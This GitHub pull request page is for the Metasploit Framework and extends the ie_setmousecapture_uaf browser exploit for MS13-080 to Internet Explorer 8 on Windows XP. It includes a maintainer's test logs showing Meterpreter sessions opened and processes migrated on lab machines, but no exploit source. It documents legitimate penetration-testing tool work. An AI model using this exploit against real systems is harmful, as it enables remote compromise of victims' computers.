Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014
Merged

win XP IE8 exploit for MS13-080 #4213

merged 2 commits into from Dec 3, 2014

Conversation

webstersprodigy
Copy link
Contributor

ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)

This pull request is probably not very useful in real life - I was just messing around.

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014
@wchen-r7
Copy link
Contributor

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process

wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014
@wchen-r7
Resolve merge conflict for ie_setmousecapture_uaf (rapid7#4213)
2fcbcc0 
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014
wchen-r7 added a commit that referenced this pull request Dec 3, 2014
@wchen-r7
Land #4213 - IE8 support for MS13-080
8bf50bb
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@webstersprodigy @wchen-r7 @todb-r7